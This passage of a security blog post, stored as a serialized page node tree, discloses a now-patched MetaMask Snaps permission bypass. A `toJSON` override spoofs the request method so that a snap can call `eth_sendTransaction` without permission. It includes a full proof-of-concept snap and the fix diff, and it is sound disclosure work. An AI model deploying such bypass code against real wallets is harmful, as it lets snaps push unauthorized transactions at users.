pollution.\n",{"type":28,"tag":116,"props":38902,"children":38903},{"class":245,"line":400},[38904,38908,38912,38916,38920,38925,38929,38934,38938,38943],{"type":28,"tag":116,"props":38905,"children":38906},{"style":260},[38907],{"type":33,"value":2186},{"type":28,"tag":116,"props":38909,"children":38910},{"style":266},[38911],{"type":33,"value":269},{"type":28,"tag":116,"props":38913,"children":38914},{"style":272},[38915],{"type":33,"value":38871},{"type":28,"tag":116,"props":38917,"children":38918},{"style":370},[38919],{"type":33,"value":31073},{"type":28,"tag":116,"props":38921,"children":38922},{"style":563},[38923],{"type":33,"value":38924}," '__proto__'",{"type":28,"tag":116,"props":38926,"children":38927},{"style":370},[38928],{"type":33,"value":23361},{"type":28,"tag":116,"props":38930,"children":38931},{"style":272},[38932],{"type":33,"value":38933}," propKey",{"type":28,"tag":116,"props":38935,"children":38936},{"style":370},[38937],{"type":33,"value":31073},{"type":28,"tag":116,"props":38939,"children":38940},{"style":563},[38941],{"type":33,"value":38942}," 'constructor'",{"type":28,"tag":116,"props":38944,"children":38945},{"style":266},[38946],{"type":33,"value":844},{"type":28,"tag":116,"props":38948,"children":38949},{"class":245,"line":614},[38950,38954,38959],{"type":28,"tag":116,"props":38951,"children":38952},{"style":260},[38953],{"type":33,"value":15405},{"type":28,"tag":116,"props":38955,"children":38956},{"style":376},[38957],{"type":33,"value":38958}," undefined",{"type":28,"tag":116,"props":38960,"children":38961},{"style":266},[38962],{"type":33,"value":384},{"type":28,"tag":116,"props":38964,"children":38965},{"class":245,"line":631},[38966],{"type":28,"tag":116,"props":38967,"children":38968},{"style":266},[38969],{"type":33,"value":2444},{"type":28,"tag":116,"props":38971,"children":38972},{"class":245,"line":665},[38973,38978,38983],{"type":28,"tag":116,"props":38974,"children":38975},{"style":260},[38976],{"type":33,"value":38977},"      return",{"type":28,"tag":116,"props":38979,"children":38980},{"style":272},[38981],{"type":33,"value":38982}," propValue",{"type":28,"tag":116,"props":38984,"children":38985},{"style":266},[38986],{"type":33,"value":384},{"type":28,"tag":116,"props":38988,"children":38989},{"class":245,"line":713},[38990],{"type":28,"tag":116,"props":38991,"children":38992},{"style":266},[38993],{"type":33,"value":38167},{"type":28,"tag":116,"props":38995,"children":38996},{"class":245,"line":750},[38997],{"type":28,"tag":116,"props":38998,"children":38999},{"style":266},[39000],{"type":33,"value":38034},{"type":28,"tag":116,"props":39002,"children":39003},{"class":245,"line":779},[39004],{"type":28,"tag":116,"props":39005,"children":39006},{"style":266},[39007],{"type":33,"value":34964},{"type":28,"tag":29,"props":39009,"children":39010},{},[39011,39013,39019,39021,39026,39028,39034,39036,39042],{"type":33,"value":39012},"The function performs a ",{"type":28,"tag":98,"props":39014,"children":39016},{"className":39015},[],[39017],{"type":33,"value":39018},"JSON.parse(JSON.stringify(value))",{"type":33,"value":39020}," in the argument sent to ",{"type":28,"tag":98,"props":39022,"children":39024},{"className":39023},[],[39025],{"type":33,"value":38697},{"type":33,"value":39027},". This specific function is how we found a way to exploit the assertion limitations. The bypass is made by setting a ",{"type":28,"tag":98,"props":39029,"children":39031},{"className":39030},[],[39032],{"type":33,"value":39033},"toJSON",{"type":33,"value":39035}," function in a legit ",{"type":28,"tag":98,"props":39037,"children":39039},{"className":39038},[],[39040],{"type":33,"value":39041},"snap.request",{"type":33,"value":39043}," argument:",{"type":28,"tag":455,"props":39045,"children":39046},{},[39047,39052,39057],{"type":28,"tag":459,"props":39048,"children":39049},{},[39050],{"type":33,"value":39051},"assertSnapOutboundRequest(args) -> pass the assertion",{"type":28,"tag":459,"props":39053,"children":39054},{},[39055],{"type":33,"value":39056},"sanitizedArgs = getSafeJson(args) -> toJSON returns a malicious object",{"type":28,"tag":459,"props":39058,"children":39059},{},[39060],{"type":33,"value":39061},"originalRequest(sanitizedArgs) -> forwards the malicious object",{"type":28,"tag":29,"props":39063,"children":39064},{},[39065],{"type":33,"value":39066},"The assertion bypass can be useful on two occasions:",{"type":28,"tag":455,"props":39068,"children":39069},{},[39070,39075],{"type":28,"tag":459,"props":39071,"children":39072},{},[39073],{"type":33,"value":39074},"forward blocked RPC methods",{"type":28,"tag":459,"props":39076,"children":39077},{},[39078,39080,39085,39087,39093,39095,39100],{"type":33,"value":39079},"Making requests in ",{"type":28,"tag":98,"props":39081,"children":39083},{"className":39082},[],[39084],{"type":33,"value":39041},{"type":33,"value":39086}," that were only supposed to be done within ",{"type":28,"tag":98,"props":39088,"children":39090},{"className":39089},[],[39091],{"type":33,"value":39092},"ethereum.request",{"type":33,"value":39094}," (with ",{"type":28,"tag":98,"props":39096,"children":39098},{"className":39097},[],[39099],{"type":33,"value":38271},{"type":33,"value":39101}," enabled).",{"type":28,"tag":29,"props":39103,"children":39104},{},[39105],{"type":33,"value":39106},"This particular vulnerability allows the snap to perform ethereum requests without permissions.",{"type":28,"tag":75,"props":39108,"children":39109},{"id":5333},[39110],{"type":33,"value":5336},{"type":28,"tag":29,"props":39112,"children":39113},{},[39114],{"type":33,"value":39115},"The bypass we described may be used to mislead the allowed permissions of the snap. This can cause the snap installation confirmation popup not to display the actual permissions of the snap. This exploit allows the snap to unexpectedly propose malicious transactions to the user, which shouldn't be possible, even with permissions according to the documentation.",{"type":28,"tag":29,"props":39117,"children":39118},{},[39119],{"type":28,"tag":206,"props":39120,"children":39122},{"alt":7,"src":39121},"/posts/metamask-snaps/note.png",[],{"type":28,"tag":75,"props":39124,"children":39125},{"id":445},[39126],{"type":33,"value":448},{"type":28,"tag":29,"props":39128,"children":39129},{},[39130,39132,39137,39139,39144,39146,39152],{"type":33,"value":39131},"To demonstrate the issue, we created a snap without the ",{"type":28,"tag":98,"props":39133,"children":39135},{"className":39134},[],[39136],{"type":33,"value":38271},{"type":33,"value":39138}," permission, and used the ",{"type":28,"tag":98,"props":39140,"children":39142},{"className":39141},[],[39143],{"type":33,"value":37801},{"type":33,"value":39145}," interface to call ",{"type":28,"tag":98,"props":39147,"children":39149},{"className":39148},[],[39150],{"type":33,"value":39151},"eth_sendTransaction",{"type":33,"value":39153},". According to the documentation, this shouldn't be possible:",{"type":28,"tag":234,"props":39155,"children":39157},{"className":35239,"code":39156,"language":35241,"meta":7,"style":7},"import { OnRpcRequestHandler } from '@metamask/snaps-types';\n\n\nfunction jsonExploit(){\n  let x = [] as any\n\n  x.method = \"snap_dialog\"\n\n  x.toJSON = () => {\n    return {\n      method: \"eth_requestAccounts\",\n      params: []\n    }\n  }\n\n  return snap.request(x)\n\n}\n\nfunction transactionExploit(){\n  let x = [] as any\n\n  x.method = \"snap_dialog\"\n\n  x.toJSON = () => {\n    return {\n      method: \"eth_sendTransaction\",\n      params: [{\n        from: \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\", // change this to your address\n        to: \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\",\n        value: \"0x1\",\n      }]\n    }\n  }\n\n  return snap.request(x);\n}\n\nexport const onRpcRequest: OnRpcRequestHandler = ({ origin, request }) => {\n\n  switch (request.method) {\n    case 'json':\n      return jsonExploit();\n    case 'transaction':\n      return transactionExploit();\n    default:\n      throw new Error('Method not found.');\n  }\n};\n",[39158],{"type":28,"tag":98,"props":39159,"children":39160},{"__ignoreMap":7},[39161,39194,39201,39208,39225,39254,39261,39286,39293,39325,39336,39353,39366,39373,39380,39387,39419,39426,39433,39440,39456,39483,39490,39513,39520,39551,39562,39578,39590,39611,39626,39643,39651,39658,39665,39672,39703,39710,39717,39777,39784,39812,39829,39844,39860,39875,39887,39917,39924],{"type":28,"tag":116,"props":39162,"children":39163},{"class":245,"line":246},[39164,39168,39172,39177,39181,39185,39190],{"type":28,"tag":116,"props":39165,"children":39166},{"style":260},[39167],{"type":33,"value":19147},{"type":28,"tag":116,"props":39169,"children":39170},{"style":266},[39171],{"type":33,"value":9254},{"type":28,"tag":116,"props":39173,"children":39174},{"style":272},[39175],{"type":33,"value":39176},"OnRpcRequestHandler",{"type":28,"tag":116,"props":39178,"children":39179},{"style":266},[39180],{"type":33,"value":35828},{"type":28,"tag":116,"props":39182,"children":39183},{"style":260},[39184],{"type":33,"value":19137},{"type":28,"tag":116,"props":39186,"children":39187},{"style":563},[39188],{"type":33,"value":39189}," '@metamask/snaps-types'",{"type":28,"tag":116,"props":39191,"children":39192},{"style":266},[39193],{"type":33,"value":384},{"type":28,"tag":116,"props":39195,"children":39196},{"class":245,"line":256},[39197],{"type":28,"tag":116,"props":39198,"children":39199},{"emptyLinePlaceholder":19},[39200],{"type":33,"value":1044},{"type":28,"tag":116,"props":39202,"children":39203},{"class":245,"line":293},[39204],{"type":28,"tag":116,"props":39205,"children":39206},{"emptyLinePlaceholder":19},[39207],{"type":33,"value":1044},{"type":28,"tag":116,"props":39209,"children":39210},{"class":245,"line":361},[39211,39215,39220],{"type":28,"tag":116,"props":39212,"children":39213},{"style":376},[39214],{"type":33,"value":830},{"type":28,"tag":116,"props":39216,"children":39217},{"style":282},[39218],{"type":33,"value":39219}," jsonExploit",{"type":28,"tag":116,"props":39221,"children":39222},{"style":266},[39223],{"type":33,"value":39224},"(){\n",{"type":28,"tag":116,"props":39226,"children":39227},{"class":245,"line":387},[39228,39232,39236,39240,39245,39249],{"type":28,"tag":116,"props":39229,"children":39230},{"style":376},[39231],{"type":33,"value":7527},{"type":28,"tag":116,"props":39233,"children":39234},{"style":272},[39235],{"type":33,"value":18728},{"type":28,"tag":116,"props":39237,"children":39238},{"style":370},[39239],{"type":33,"value":2226},{"type":28,"tag":116,"props":39241,"children":39242},{"style":266},[39243],{"type":33,"value":39244}," [] ",{"type":28,"tag":116,"props":39246,"children":39247},{"style":260},[39248],{"type":33,"value":8513},{"type":28,"tag":116,"props":39250,"children":39251},{"style":339},[39252],{"type":33,"value":39253}," any\n",{"type":28,"tag":116,"props":39255,"children":39256},{"class":245,"line":400},[39257],{"type":28,"tag":116,"props":39258,"children":39259},{"emptyLinePlaceholder":19},[39260],{"type":33,"value":1044},{"type":28,"tag":116,"props":39262,"children":39263},{"class":245,"line":614},[39264,39269,39273,39277,39281],{"type":28,"tag":116,"props":39265,"children":39266},{"style":272},[39267],{"type":33,"value":39268},"  x",{"type":28,"tag":116,"props":39270,"children":39271},{"style":266},[39272],{"type":33,"value":141},{"type":28,"tag":116,"props":39274,"children":39275},{"style":272},[39276],{"type":33,"value":37935},{"type":28,"tag":116,"props":39278,"children":39279},{"style":370},[39280],{"type":33,"value":2226},{"type":28,"tag":116,"props":39282,"children":39283},{"style":563},[39284],{"type":33,"value":39285}," \"snap_dialog\"\n",{"type":28,"tag":116,"props":39287,"children":39288},{"class":245,"line":631},[39289],{"type":28,"tag":116,"props":39290,"children":39291},{"emptyLinePlaceholder":19},[39292],{"type":33,"value":1044},{"type":28,"tag":116,"props":39294,"children":39295},{"class":245,"line":665},[39296,39300,39304,39308,39312,39317,39321],{"type":28,"tag":116,"props":39297,"children":39298},{"style":272},[39299],{"type":33,"value":39268},{"type":28,"tag":116,"props":39301,"children":39302},{"style":266},[39303],{"type":33,"value":141},{"type":28,"tag":116,"props":39305,"children":39306},{"style":282},[39307],{"type":33,"value":39033},{"type":28,"tag":116,"props":39309,"children":39310},{"style":370},[39311],{"type":33,"value":2226},{"type":28,"tag":116,"props":39313,"children":39314},{"style":266},[39315],{"type":33,"value":39316}," () ",{"type":28,"tag":116,"props":39318,"children":39319},{"style":376},[39320],{"type":33,"value":1286},{"type":28,"tag":116,"props":39322,"children":39323},{"style":266},[39324],{"type":33,"value":1291},{"type":28,"tag":116,"props":39326,"children":39327},{"class":245,"line":713},[39328,39332],{"type":28,"tag":116,"props":39329,"children":39330},{"style":260},[39331],{"type":33,"value":393},{"type":28,"tag":116,"props":39333,"children":39334},{"style":266},[39335],{"type":33,"value":1291},{"type":28,"tag":116,"props":39337,"children":39338},{"class":245,"line":750},[39339,39344,39349],{"type":28,"tag":116,"props":39340,"children":39341},{"style":272},[39342],{"type":33,"value":39343},"      method:",{"type":28,"tag":116,"props":39345,"children":39346},{"style":563},[39347],{"type":33,"value":39348}," \"eth_requestAccounts\"",{"type":28,"tag":116,"props":39350,"children":39351},{"style":266},[39352],{"type":33,"value":3178},{"type":28,"tag":116,"props":39354,"children":39355},{"class":245,"line":779},[39356,39361],{"type":28,"tag":116,"props":39357,"children":39358},{"style":272},[39359],{"type":33,"value":39360},"      params:",{"type":28,"tag":116,"props":39362,"children":39363},{"style":266},[39364],{"type":33,"value":39365}," []\n",{"type":28,"tag":116,"props":39367,"children":39368},{"class":245,"line":796},[39369],{"type":28,"tag":116,"props":39370,"children":39371},{"style":266},[39372],{"type":33,"value":3025},{"type":28,"tag":116,"props":39374,"children":39375},{"class":245,"line":847},[39376],{"type":28,"tag":116,"props":39377,"children":39378},{"style":266},[39379],{"type":33,"value":5543},{"type":28,"tag":116,"props":39381,"children":39382},{"class":245,"line":898},[39383],{"type":28,"tag":116,"props":39384,"children":39385},{"emptyLinePlaceholder":19},[39386],{"type":33,"value":1044},{"type":28,"tag":116,"props":39388,"children":39389},{"class":245,"line":907},[39390,39394,39399,39403,39407,39411,39415],{"type":28,"tag":116,"props":39391,"children":39392},{"style":260},[39393],{"type":33,"value":38820},{"type":28,"tag":116,"props":39395,"children":39396},{"style":272},[39397],{"type":33,"value":39398}," snap",{"type":28,"tag":116,"props":39400,"children":39401},{"style":266},[39402],{"type":33,"value":141},{"type":28,"tag":116,"props":39404,"children":39405},{"style":282},[39406],{"type":33,"value":31144},{"type":28,"tag":116,"props":39408,"children":39409},{"style":266},[39410],{"type":33,"value":313},{"type":28,"tag":116,"props":39412,"children":39413},{"style":272},[39414],{"type":33,"value":18939},{"type":28,"tag":116,"props":39416,"children":39417},{"style":266},[39418],{"type":33,"value":2830},{"type":28,"tag":116,"props":39420,"children":39421},{"class":245,"line":981},[39422],{"type":28,"tag":116,"props":39423,"children":39424},{"emptyLinePlaceholder":19},[39425],{"type":33,"value":1044},{"type":28,"tag":116,"props":39427,"children":39428},{"class":245,"line":1011},[39429],{"type":28,"tag":116,"props":39430,"children":39431},{"style":266},[39432],{"type":33,"value":406},{"type":28,"tag":116,"props":39434,"children":39435},{"class":245,"line":1029},[39436],{"type":28,"tag":116,"props":39437,"children":39438},{"emptyLinePlaceholder":19},[39439],{"type":33,"value":1044},{"type":28,"tag":116,"props":39441,"children":39442},{"class":245,"line":1038},[39443,39447,39452],{"type":28,"tag":116,"props":39444,"children":39445},{"style":376},[39446],{"type":33,"value":830},{"type":28,"tag":116,"props":39448,"children":39449},{"style":282},[39450],{"type":33,"value":39451}," transactionExploit",{"type":28,"tag":116,"props":39453,"children":39454},{"style":266},[39455],{"type":33,"value":39224},{"type":28,"tag":116,"props":39457,"children":39458},{"class":245,"line":1047},[39459,39463,39467,39471,39475,39479],{"type":28,"tag":116,"props":39460,"children":39461},{"style":376},[39462],{"type":33,"value":7527},{"type":28,"tag":116,"props":39464,"children":39465},{"style":272},[39466],{"type":33,"value":18728},{"type":28,"tag":116,"props":39468,"children":39469},{"style":370},[39470],{"type":33,"value":2226},{"type":28,"tag":116,"props":39472,"children":39473},{"style":266},[39474],{"type":33,"value":39244},{"type":28,"tag":116,"props":39476,"children":39477},{"style":260},[39478],{"type":33,"value":8513},{"type":28,"tag":116,"props":39480,"children":39481},{"style":339},[39482],{"type":33,"value":39253},{"type":28,"tag":116,"props":39484,"children":39485},{"class":245,"line":1071},[39486],{"type":28,"tag":116,"props":39487,"children":39488},{"emptyLinePlaceholder":19},[39489],{"type":33,"value":1044},{"type":28,"tag":116,"props":39491,"children":39492},{"class":245,"line":1137},[39493,39497,39501,39505,39509],{"type":28,"tag":116,"props":39494,"children":39495},{"style":272},[39496],{"type":33,"value":39268},{"type":28,"tag":116,"props":39498,"children":39499},{"style":266},[39500],{"type":33,"value":141},{"type":28,"tag":116,"props":39502,"children":39503},{"style":272},[39504],{"type":33,"value":37935},{"type":28,"tag":116,"props":39506,"children":39507},{"style":370},[39508],{"type":33,"value":2226},{"type":28,"tag":116,"props":39510,"children":39511},{"style":563},[39512],{"type":33,"value":39285},{"type":28,"tag":116,"props":39514,"children":39515},{"class":245,"line":1181},[39516],{"type":28,"tag":116,"props":39517,"children":39518},{"emptyLinePlaceholder":19},[39519],{"type":33,"value":1044},{"type":28,"tag":116,"props":39521,"children":39522},{"class":245,"line":1212},[39523,39527,39531,39535,39539,39543,39547],{"type":28,"tag":116,"props":39524,"children":39525},{"style":272},[39526],{"type":33,"value":39268},{"type":28,"tag":116,"props":39528,"children":39529},{"style":266},[39530],{"type":33,"value":141},{"type":28,"tag":116,"props":39532,"children":39533},{"style":282},[39534],{"type":33,"value":39033},{"type":28,"tag":116,"props":39536,"children":39537},{"style":370},[39538],{"type":33,"value":2226},{"type":28,"tag":116,"props":39540,"children":39541},{"style":266},[39542],{"type":33,"value":39316},{"type":28,"tag":116,"props":39544,"children":39545},{"style":376},[39546],{"type":33,"value":1286},{"type":28,"tag":116,"props":39548,"children":39549},{"style":266},[39550],{"type":33,"value":1291},{"type":28,"tag":116,"props":39552,"children":39553},{"class":245,"line":1254},[39554,39558],{"type":28,"tag":116,"props":39555,"children":39556},{"style":260},[39557],{"type":33,"value":393},{"type":28,"tag":116,"props":39559,"children":39560},{"style":266},[39561],{"type":33,"value":1291},{"type":28,"tag":116,"props":39563,"children":39564},{"class":245,"line":1262},[39565,39569,39574],{"type":28,"tag":116,"props":39566,"children":39567},{"style":272},[39568],{"type":33,"value":39343},{"type":28,"tag":116,"props":39570,"children":39571},{"style":563},[39572],{"type":33,"value":39573}," \"eth_sendTransaction\"",{"type":28,"tag":116,"props":39575,"children":39576},{"style":266},[39577],{"type":33,"value":3178},{"type":28,"tag":116,"props":39579,"children":39580},{"class":245,"line":1294},[39581,39585],{"type":28,"tag":116,"props":39582,"children":39583},{"style":272},[39584],{"type":33,"value":39360},{"type":28,"tag":116,"props":39586,"children":39587},{"style":266},[39588],{"type":33,"value":39589}," [{\n",{"type":28,"tag":116,"props":39591,"children":39592},{"class":245,"line":1334},[39593,39597,39602,39606],{"type":28,"tag":116,"props":39594,"children":39595},{"style":272},[39596],{"type":33,"value":31714},{"type":28,"tag":116,"props":39598,"children":39599},{"style":563},[39600],{"type":33,"value":39601}," \"0xcf26B767586cC5fCF8737dD3FA57de164aF4248d\"",{"type":28,"tag":116,"props":39603,"children":39604},{"style":266},[39605],{"type":33,"value":825},{"type":28,"tag":116,"props":39607,"children":39608},{"style":250},[39609],{"type":33,"value":39610},"// change this to your address\n",{"type":28,"tag":116,"props":39612,"children":39613},{"class":245,"line":1372},[39614,39618,39622],{"type":28,"tag":116,"props":39615,"children":39616},{"style":272},[39617],{"type":33,"value":31730},{"type":28,"tag":116,"props":39619,"children":39620},{"style":563},[39621],{"type":33,"value":39601},{"type":28,"tag":116,"props":39623,"children":39624},{"style":266},[39625],{"type":33,"value":3178},{"type":28,"tag":116,"props":39627,"children":39628},{"class":245,"line":1381},[39629,39634,39639],{"type":28,"tag":116,"props":39630,"children":39631},{"style":272},[39632],{"type":33,"value":39633},"        value:",{"type":28,"tag":116,"props":39635,"children":39636},{"style":563},[39637],{"type":33,"value":39638}," \"0x1\"",{"type":28,"tag":116,"props":39640,"children":39641},{"style":266},[39642],{"type":33,"value":3178},{"type":28,"tag":116,"props":39644,"children":39645},{"class":245,"line":1389},[39646],{"type":28,"tag":116,"props":39647,"children":39648},{"style":266},[39649],{"type":33,"value":39650},"      }]\n",{"type":28,"tag":116,"props":39652,"children":39653},{"class":245,"line":1425},[39654],{"type":28,"tag":116,"props":39655,"children":39656},{"style":266},[39657],{"type":33,"value":3025},{"type":28,"tag":116,"props":39659,"children":39660},{"class":245,"line":1448},[39661],{"type":28,"tag":116,"props":39662,"children":39663},{"style":266},[39664],{"type":33,"value":5543},{"type":28,"tag":116,"props":39666,"children":39667},{"class":245,"line":1456},[39668],{"type":28,"tag":116,"props":39669,"children":39670},{"emptyLinePlaceholder":19},[39671],{"type":33,"value":1044},{"type":28,"tag":116,"props":39673,"children":39674},{"class":245,"line":1520},[39675,39679,39683,39687,39691,39695,39699],{"type":28,"tag":116,"props":39676,"children":39677},{"style":260},[39678],{"type":33,"value":38820},{"type":28,"tag":116,"props":39680,"children":39681},{"style":272},[39682],{"type":33,"value":39398},{"type":28,"tag":116,"props":39684,"children":39685},{"style":266},[39686],{"type":33,"value":141},{"type":28,"tag":116,"props":39688,"children":39689},{"style":282},[39690],{"type":33,"value":31144},{"type":28,"tag":116,"props":39692,"children":39693},{"style":266},[39694],{"type":33,"value":313},{"type":28,"tag":116,"props":39696,"children":39697},{"style":272},[39698],{"type":33,"value":18939},{"type":28,"tag":116,"props":39700,"children":39701},{"style":266},[39702],{"type":33,"value":895},{"type":28,"tag":116,"props":39704,"children":39705},{"class":245,"line":1580},[39706],{"type":28,"tag":116,"props":39707,"children":39708},{"style":266},[39709],{"type":33,"value":406},{"type":28,"tag":116,"props":39711,"children":39712},{"class":245,"line":1620},[39713],{"type":28,"tag":116,"props":39714,"children":39715},{"emptyLinePlaceholder":19},[39716],{"type":33,"value":1044},{"type":28,"tag":116,"props":39718,"children":39719},{"class":245,"line":1668},[39720,39724,39728,39733,39737,39742,39746,39751,39756,39760,39764,39769,39773],{"type":28,"tag":116,"props":39721,"children":39722},{"style":260},[39723],{"type":33,"value":37832},{"type":28,"tag":116,"props":39725,"children":39726},{"style":376},[39727],{"type":33,"value":38732},{"type":28,"tag":116,"props":39729,"children":39730},{"style":282},[39731],{"type":33,"value":39732}," onRpcRequest",{"type":28,"tag":116,"props":39734,"children":39735},{"style":370},[39736],{"type":33,"value":4160},{"type":28,"tag":116,"props":39738,"children":39739},{"style":339},[39740],{"type":33,"value":39741}," OnRpcRequestHandler",{"type":28,"tag":116,"props":39743,"children":39744},{"style":370},[39745],{"type":33,"value":2226},{"type":28,"tag":116,"props":39747,"children":39748},{"style":266},[39749],{"type":33,"value":39750}," ({ ",{"type":28,"tag":116,"props":39752,"children":39753},{"style":272},[39754],{"type":33,"value":39755},"origin",{"type":28,"tag":116,"props":39757,"children":39758},{"style":266},[39759],{"type":33,"value":825},{"type":28,"tag":116,"props":39761,"children":39762},{"style":272},[39763],{"type":33,"value":31144},{"type":28,"tag":116,"props":39765,"children":39766},{"style":266},[39767],{"type":33,"value":39768}," }) ",{"type":28,"tag":116,"props":39770,"children":39771},{"style":376},[39772],{"type":33,"value":1286},{"type":28,"tag":116,"props":39774,"children":39775},{"style":266},[39776],{"type":33,"value":1291},{"type":28,"tag":116,"props":39778,"children":39779},{"class":245,"line":1677},[39780],{"type":28,"tag":116,"props":39781,"children":39782},{"emptyLinePlaceholder":19},[39783],{"type":33,"value":1044},{"type":28,"tag":116,"props":39785,"children":39786},{"class":245,"line":1685},[39787,39792,39796,39800,39804,39808],{"type":28,"tag":116,"props":39788,"children":39789},{"style":260},[39790],{"type":33,"value":39791},"  switch",{"type":28,"tag":116,"props":39793,"children":39794},{"style":266},[39795],{"type":33,"value":269},{"type":28,"tag":116,"props":39797,"children":39798},{"style":272},[39799],{"type":33,"value":31144},{"type":28,"tag":116,"props":39801,"children":39802},{"style":266},[39803],{"type":33,"value":141},{"type":28,"tag":116,"props":39805,"children":39806},{"style":272},[39807],{"type":33,"value":37935},{"type":28,"tag":116,"props":39809,"children":39810},{"style":266},[39811],{"type":33,"value":844},{"type":28,"tag":116,"props":39813,"children":39814},{"class":245,"line":1729},[39815,39820,39825],{"type":28,"tag":116,"props":39816,"children":39817},{"style":260},[39818],{"type":33,"value":39819},"    case",{"type":28,"tag":116,"props":39821,"children":39822},{"style":563},[39823],{"type":33,"value":39824}," 'json'",{"type":28,"tag":116,"props":39826,"children":39827},{"style":266},[39828],{"type":33,"value":5239},{"type":28,"tag":116,"props":39830,"children":39831},{"class":245,"line":1764},[39832,39836,39840],{"type":28,"tag":116,"props":39833,"children":39834},{"style":260},[39835],{"type":33,"value":38977},{"type":28,"tag":116,"props":39837,"children":39838},{"style":282},[39839],{"type":33,"value":39219},{"type":28,"tag":116,"props":39841,"children":39842},{"style":266},[39843],{"type":33,"value":1445},{"type":28,"tag":116,"props":39845,"children":39846},{"class":245,"line":1896},[39847,39851,39856],{"type":28,"tag":116,"props":39848,"children":39849},{"style":260},[39850],{"type":33,"value":39819},{"type":28,"tag":116,"props":39852,"children":39853},{"style":563},[39854],{"type":33,"value":39855}," 'transaction'",{"type":28,"tag":116,"props":39857,"children":39858},{"style":266},[39859],{"type":33,"value":5239},{"type":28,"tag":116,"props":39861,"children":39862},{"class":245,"line":1932},[39863,39867,39871],{"type":28,"tag":116,"props":39864,"children":39865},{"style":260},[39866],{"type":33,"value":38977},{"type":28,"tag":116,"props":39868,"children":39869},{"style":282},[39870],{"type":33,"value":39451},{"type":28,"tag":116,"props":39872,"children":39873},{"style":266},[39874],{"type":33,"value":1445},{"type":28,"tag":116,"props":39876,"children":39877},{"class":245,"line":1940},[39878,39883],{"type":28,"tag":116,"props":39879,"children":39880},{"style":260},[39881],{"type":33,"value":39882},"    default",{"type":28,"tag":116,"props":39884,"children":39885},{"style":266},[39886],{"type":33,"value":5239},{"type":28,"tag":116,"props":39888,"children":39889},{"class":245,"line":1948},[39890,39895,39899,39904,39908,39913],{"type":28,"tag":116,"props":39891,"children":39892},{"style":260},[39893],{"type":33,"value":39894},"      throw",{"type":28,"tag":116,"props":39896,"children":39897},{"style":376},[39898],{"type":33,"value":31582},{"type":28,"tag":116,"props":39900,"children":39901},{"style":282},[39902],{"type":33,"value":39903}," Error",{"type":28,"tag":116,"props":39905,"children":39906},{"style":266},[39907],{"type":33,"value":313},{"type":28,"tag":116,"props":39909,"children":39910},{"style":563},[39911],{"type":33,"value":39912},"'Method not found.'",{"type":28,"tag":116,"props":39914,"children":39915},{"style":266},[39916],{"type":33,"value":895},{"type":28,"tag":116,"props":39918,"children":39919},{"class":245,"line":1957},[39920],{"type":28,"tag":116,"props":39921,"children":39922},{"style":266},[39923],{"type":33,"value":5543},{"type":28,"tag":116,"props":39925,"children":39926},{"class":245,"line":1970},[39927],{"type":28,"tag":116,"props":39928,"children":39929},{"style":266},[39930],{"type":33,"value":16239},{"type":28,"tag":29,"props":39932,"children":39933},{},[39934,39936,39942,39944,39949],{"type":33,"value":39935},"We set ",{"type":28,"tag":98,"props":39937,"children":39939},{"className":39938},[],[39940],{"type":33,"value":39941},"x.method = \"snap_dialog\"",{"type":33,"value":39943}," to pass the assertion and setup a toJSON function to change this method to ",{"type":28,"tag":98,"props":39945,"children":39947},{"className":39946},[],[39948],{"type":33,"value":39151},{"type":33,"value":39950}," after.",{"type":28,"tag":75,"props":39952,"children":39954},{"id":39953},"mitigation",[39955],{"type":33,"value":39956},"Mitigation",{"type":28,"tag":29,"props":39958,"children":39959},{},[39960,39962,39967,39969,39976],{"type":33,"value":39961},"Metamask mitigated this issue by asserting the arguments after the ",{"type":28,"tag":98,"props":39963,"children":39965},{"className":39964},[],[39966],{"type":33,"value":38697},{"type":33,"value":39968}," function execution. The patch was introduced on commit ",{"type":28,"tag":87,"props":39970,"children":39973},{"href":39971,"rel":39972},"https://github.com/MetaMask/snaps/pull/1762/commits/168ff082102a65e2aad428f44c5b10f9a100c689",[91],[39974],{"type":33,"value":39975},"168ff08",{"type":33,"value":39977}," with the following changes:",{"type":28,"tag":234,"props":39979,"children":39983},{"className":39980,"code":39981,"language":39982,"meta":7,"style":7},"language-diff shiki shiki-themes slack-dark","const request = async (args: RequestArguments) => {\n-      assertEthereumOutboundRequest(args);\n-      const sanitizedArgs = getSafeJson(args);\n+      const sanitizedArgs = getSafeJson(args) as RequestArguments;\n+      assertEthereumOutboundRequest(sanitizedArgs);\n","diff",[39984],{"type":28,"tag":98,"props":39985,"children":39986},{"__ignoreMap":7},[39987,39995,40003,40011,40019],{"type":28,"tag":116,"props":39988,"children":39989},{"class":245,"line":246},[39990],{"type":28,"tag":116,"props":39991,"children":39992},{"style":266},[39993],{"type":33,"value":39994},"const request = async (args: RequestArguments) => {\n",{"type":28,"tag":116,"props":39996,"children":39997},{"class":245,"line":256},[39998],{"type":28,"tag":116,"props":39999,"children":40000},{"style":563},[40001],{"type":33,"value":40002},"-      assertEthereumOutboundRequest(args);\n",{"type":28,"tag":116,"props":40004,"children":40005},{"class":245,"line":293},[40006],{"type":28,"tag":116,"props":40007,"children":40008},{"style":563},[40009],{"type":33,"value":40010},"-      const sanitizedArgs = getSafeJson(args);\n",{"type":28,"tag":116,"props":40012,"children":40013},{"class":245,"line":361},[40014],{"type":28,"tag":116,"props":40015,"children":40016},{"style":350},[40017],{"type":33,"value":40018},"+      const sanitizedArgs = getSafeJson(args) as RequestArguments;\n",{"type":28,"tag":116,"props":40020,"children":40021},{"class":245,"line":387},[40022],{"type":28,"tag":116,"props":40023,"children":40024},{"style":350},[40025],{"type":33,"value":40026},"+      assertEthereumOutboundRequest(sanitizedArgs);\n",{"type":28,"tag":63,"props":40028,"children":40029},{"id":2506},[40030],{"type":33,"value":2509},{"type":28,"tag":29,"props":40032,"children":40033},{},[40034],{"type":33,"value":40035},"This unique property spoofing vulnerability in the Snaps sandboxing implementation illustrates the wide range of control attackers have in Javascript, which makes designing robust sandbox implementations an extremely complex task.",{"type":28,"tag":29,"props":40037,"children":40038},{},[40039],{"type":33,"value":40040},"Metamask has implemented numerous layers to mitigate potential exploits, and we're proud to help contribute to making Snaps more 